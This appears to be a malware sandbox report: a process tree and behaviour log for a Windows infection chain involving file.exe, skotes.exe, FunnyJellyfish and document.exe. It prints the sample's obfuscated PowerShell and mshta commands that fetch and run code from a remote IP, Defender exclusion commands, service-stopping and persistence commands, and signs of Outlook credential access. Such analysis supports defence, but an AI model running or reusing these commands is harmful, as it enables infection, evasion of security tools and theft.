2684 powershell.exe 2684 powershell.exe 5340 LB31.exe 5340 LB31.exe 5340 LB31.exe 5340 LB31.exe 5340 LB31.exe 5340 LB31.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2164 powershell.exe Token: SeDebugPrivilege 1988 powershell.exe Token: SeDebugPrivilege 4364 RegSvcs.exe Token: SeDebugPrivilege 3868 powershell.exe Token: SeDebugPrivilege 1448 powershell.exe Token: SeDebugPrivilege 6084 document.exe Token: SeDebugPrivilege 5380 powershell.exe Token: SeDebugPrivilege 232 powershell.exe Token: SeDebugPrivilege 2740 powershell.exe Token: SeIncreaseQuotaPrivilege 232 powershell.exe Token: SeSecurityPrivilege 232 powershell.exe Token: SeTakeOwnershipPrivilege 232 powershell.exe Token: SeLoadDriverPrivilege 232 powershell.exe Token: SeSystemProfilePrivilege 232 powershell.exe Token: SeSystemtimePrivilege 232 powershell.exe Token: SeProfSingleProcessPrivilege 232 powershell.exe Token: SeIncBasePriorityPrivilege 232 powershell.exe Token: SeCreatePagefilePrivilege 232 powershell.exe Token: SeBackupPrivilege 232 powershell.exe Token: SeRestorePrivilege 232 powershell.exe Token: SeShutdownPrivilege 232 powershell.exe Token: SeDebugPrivilege 232 powershell.exe Token: SeSystemEnvironmentPrivilege 232 powershell.exe Token: SeRemoteShutdownPrivilege 232 powershell.exe Token: SeUndockPrivilege 232 powershell.exe Token: SeManageVolumePrivilege 232 powershell.exe Token: 33 232 powershell.exe Token: 34 232 powershell.exe Token: 35 232 powershell.exe Token: 36 232 powershell.exe Token: SeDebugPrivilege 6136 powershell.exe Token: SeDebugPrivilege 2544 powershell.exe Token: SeDebugPrivilege 3276 powershell.exe Token: SeIncreaseQuotaPrivilege 2544 powershell.exe Token: SeSecurityPrivilege 2544 powershell.exe Token: SeTakeOwnershipPrivilege 2544 powershell.exe Token: SeLoadDriverPrivilege 2544 powershell.exe Token: SeSystemProfilePrivilege 2544 powershell.exe Token: SeSystemtimePrivilege 2544 powershell.exe Token: SeProfSingleProcessPrivilege 2544 powershell.exe Token: SeIncBasePriorityPrivilege 2544 powershell.exe Token: SeCreatePagefilePrivilege 2544 powershell.exe Token: SeBackupPrivilege 2544 powershell.exe Token: SeRestorePrivilege 2544 powershell.exe Token: SeShutdownPrivilege 2544 powershell.exe Token: SeDebugPrivilege 2544 powershell.exe Token: SeSystemEnvironmentPrivilege 2544 powershell.exe Token: SeRemoteShutdownPrivilege 2544 powershell.exe Token: SeUndockPrivilege 2544 powershell.exe Token: SeManageVolumePrivilege 2544 powershell.exe Token: 33 2544 powershell.exe Token: 34 2544 powershell.exe Token: 35 2544 powershell.exe Token: 36 2544 powershell.exe Token: SeIncreaseQuotaPrivilege 2544 powershell.exe Token: SeSecurityPrivilege 2544 powershell.exe Token: SeTakeOwnershipPrivilege 2544 powershell.exe Token: SeLoadDriverPrivilege 2544 powershell.exe Token: SeSystemProfilePrivilege 2544 powershell.exe Token: SeSystemtimePrivilege 2544 powershell.exe Token: SeProfSingleProcessPrivilege 2544 powershell.exe Token: SeIncBasePriorityPrivilege 2544 powershell.exe Token: SeCreatePagefilePrivilege 2544 powershell.exe Token: SeBackupPrivilege 2544 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 4364 file.exe 5148 FunnyJellyfish.tmp -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 6084 document.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4364 wrote to memory of 3188 4364 file.exe 83 PID 4364 wrote to memory of 3188 4364 file.exe 83 PID 4364 wrote to memory of 3188 4364 file.exe 83 PID 3188 wrote to memory of 1096 3188 skotes.exe 89 PID 3188 wrote to memory of 1096 3188 skotes.exe 89 PID 3188 wrote to memory of 1096 3188 skotes.exe 89 PID 3188 wrote to memory of 1832 3188 skotes.exe 93 PID 3188 wrote to memory of 1832 3188 skotes.exe 93 PID 1832 wrote to memory of 4400 1832 file.exe 94 PID 1832 wrote to memory of 4400 1832 file.exe 94 PID 4400 wrote to memory of 1988 4400 wscript.exe 95 PID 4400 wrote to memory of 1988 4400 wscript.exe 95 PID 4400 wrote to memory of 2164 4400 wscript.exe 96 PID 4400 wrote to memory of 2164 4400 wscript.exe 96 PID 1988 wrote to memory of 2136 1988 powershell.exe 103 PID 1988 wrote to memory of 2136 1988 powershell.exe 103 PID 2164 wrote to memory of 2428 2164 powershell.exe 104 PID 2164 wrote to memory of 2428 2164 powershell.exe 104 PID 2136 wrote to memory of 1692 2136 WScript.exe 105 PID 2136 wrote to memory of 1692 2136 WScript.exe 105 PID 2164 wrote to memory of 4364 2164 powershell.exe 107 PID 2164 wrote to memory of 4364 2164 powershell.exe 107 PID 2164 wrote to memory of 4364 2164 powershell.exe 107 PID 2164 wrote to memory of 4364 2164 powershell.exe 107 PID 2164 wrote to memory of 4364 2164 powershell.exe 107 PID 2164 wrote to memory of 4364 2164 powershell.exe 107 PID 2164 wrote to memory of 4364 2164 powershell.exe 107 PID 2164 wrote to memory of 4364 2164 powershell.exe 107 PID 1692 wrote to memory of 2344 1692 cmd.exe 108 PID 1692 wrote to memory of 2344 1692 cmd.exe 108 PID 2344 wrote to memory of 3868 2344 mshta.exe 109 PID 2344 wrote to memory of 3868 2344 mshta.exe 109 PID 3868 wrote to memory of 1448 3868 powershell.exe 111 PID 3868 wrote to memory of 1448 3868 powershell.exe 111 PID 3188 wrote to memory of 2448 3188 skotes.exe 112 PID 3188 wrote to memory of 2448 3188 skotes.exe 112 PID 3188 wrote to memory of 2448 3188 skotes.exe 112 PID 2448 wrote to memory of 4236 2448 FunnyJellyfish.exe 113 PID 2448 wrote to memory of 4236 2448 FunnyJellyfish.exe 113 PID 2448 wrote to memory of 4236 2448 FunnyJellyfish.exe 113 PID 4236 wrote to memory of 5868 4236 FunnyJellyfish.tmp 114 PID 4236 wrote to memory of 5868 4236 FunnyJellyfish.tmp 114 PID 4236 wrote to memory of 5868 4236 FunnyJellyfish.tmp 114 PID 5868 wrote to memory of 1068 5868 cmd.exe 116 PID 5868 wrote to memory of 1068 5868 cmd.exe 116 PID 5868 wrote to memory of 1068 5868 cmd.exe 116 PID 3188 wrote to memory of 6084 3188 skotes.exe 117 PID 3188 wrote to memory of 6084 3188 skotes.exe 117 PID 6084 wrote to memory of 5380 6084 document.exe 119 PID 6084 wrote to memory of 5380 6084 document.exe 119 PID 5868 wrote to memory of 2756 5868 cmd.exe 121 PID 5868 wrote to memory of 2756 5868 cmd.exe 121 PID 5868 wrote to memory of 2756 5868 cmd.exe 121 PID 2756 wrote to memory of 5148 2756 FunnyJellyfish.exe 122 PID 2756 wrote to memory of 5148 2756 FunnyJellyfish.exe 122 PID 2756 wrote to memory of 5148 2756 FunnyJellyfish.exe 122 PID 5148 wrote to memory of 5228 5148 FunnyJellyfish.tmp 123 PID 5148 wrote to memory of 5228 5148 FunnyJellyfish.tmp 123 PID 5148 wrote to memory of 5228 5148 FunnyJellyfish.tmp 123 PID 5228 wrote to memory of 5716 5228 regsvr32.exe 124 PID 5228 wrote to memory of 5716 5228 regsvr32.exe 124 PID 5716 wrote to memory of 232 5716 regsvr32.exe 126 PID 5716 wrote to memory of 232 5716 regsvr32.exe 126 PID 6084 wrote to memory of 2740 6084 document.exe 128 -
outlook_office_path 1 IoCs
description ioc Process Key queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
outlook_win_path 1 IoCs
description ioc Process Key queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:336
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:952
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:412
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1036
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1136
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1148
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2668
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5304
-
-
C:\Windows\system32\regsvr32.EXEC:\Windows\system32\regsvr32.EXE /S /i:INSTALL C:\Users\Admin\AppData\Roaming\DelightfulCard.dll2⤵
- Loads dropped DLL
PID:6032 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\Admin\AppData\Roaming\DelightfulCard.dll' }) { exit 0 } else { exit 1 }"3⤵
- Command and Scripting Interpreter: PowerShell
PID:3276
-
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe2⤵PID:4564
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1156
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1244
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1284
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1300
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1380
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1412
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2548
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1516
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1548
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1568
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1668
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1704
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1728
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1796
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1804
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1900
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1912
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1968
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1992
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1872
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2172
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2180
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2284
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2412
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2420
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2576
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2644
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2716
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2728
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2776
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2808
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2964
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3040
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3460
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3540
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4364 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3188 -
C:\Users\Admin\AppData\Local\Temp\1007944001\L.exe"C:\Users\Admin\AppData\Local\Temp\1007944001\L.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1096
-
-
C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe"C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1832 -
C:\Windows\SYSTEM32\wscript.exe"wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4400 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1988 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"7⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-Update8⤵
- Suspicious use of WriteProcessMemory
PID:1692 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵PID:4776
-
-
C:\Windows\system32\mshta.exemshta http://176.113.115.178/Windows-Update9⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2344 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X10⤵
- UAC bypass
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3868 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1448
-
-
C:\Users\Admin\AppData\Roaming\LB31.exe"C:\Users\Admin\AppData\Roaming\LB31.exe"11⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:5340 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2684
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart12⤵PID:4760
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart13⤵PID:5888
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc12⤵
- Launches sc.exe
PID:6052
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc12⤵
- Launches sc.exe
PID:5140
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv12⤵
- Launches sc.exe
PID:6128
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits12⤵
- Launches sc.exe
PID:5548
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc12⤵
- Launches sc.exe
PID:1856
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 012⤵
- Power Settings
PID:3988
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 012⤵
- Power Settings
PID:2636
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 012⤵
- Power Settings
PID:3704
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 012⤵
- Power Settings
PID:5860
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe12⤵PID:6028
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "LIB"12⤵
- Launches sc.exe
PID:4532
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto"12⤵
- Launches sc.exe
PID:1832
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog12⤵
- Launches sc.exe
PID:5892
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "LIB"12⤵
- Launches sc.exe
PID:6048 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV113⤵PID:2216
-
-
-
-
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2164 -
C:\Windows\system32\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /flushdns7⤵
- Gathers network information
PID:2428
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"7⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:4364
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe"C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2448 -
C:\Users\Admin\AppData\Local\Temp\is-KCBNC.tmp\FunnyJellyfish.tmp"C:\Users\Admin\AppData\Local\Temp\is-KCBNC.tmp\FunnyJellyfish.tmp" /SL5="$B01D8,1097818,140800,C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4236 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C timeout /T 3 & "C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe" /VERYSILENT /SUPPRESSMSGBOXES6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5868 -
C:\Windows\SysWOW64\timeout.exetimeout /T 37⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1068
-
-
C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe"C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe" /VERYSILENT /SUPPRESSMSGBOXES7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Users\Admin\AppData\Local\Temp\is-7A33L.tmp\FunnyJellyfish.tmp"C:\Users\Admin\AppData\Local\Temp\is-7A33L.tmp\FunnyJellyfish.tmp" /SL5="$70034,1097818,140800,C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe" /VERYSILENT /SUPPRESSMSGBOXES8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5148 -
C:\Windows\SysWOW64\regsvr32.exe"regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\DelightfulCard.dll"9⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5228 -
C:\Windows\system32\regsvr32.exe/s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\DelightfulCard.dll"10⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5716 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\Admin\AppData\Roaming\DelightfulCard.dll' }) { exit 0 } else { exit 1 }"11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:232
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\Admin\AppData\Roaming\DelightfulCard.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{AE08539B-70E9-419C-AE46-8E15B5A9038C}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2544
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1008030001\document.exe"C:\Users\Admin\AppData\Local\Temp\1008030001\document.exe"4⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:6084 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1008030001\document.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5380
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'document.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2740
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\svchost.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6136
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3276
-
-
-
C:\Users\Admin\AppData\Local\Temp\1008050001\fb7a2e6abe.exe"C:\Users\Admin\AppData\Local\Temp\1008050001\fb7a2e6abe.exe"4⤵PID:5836
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"5⤵
- Uses browser remote debugging
PID:4720 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7fff7279cc40,0x7fff7279cc4c,0x7fff7279cc586⤵PID:5240
-
-
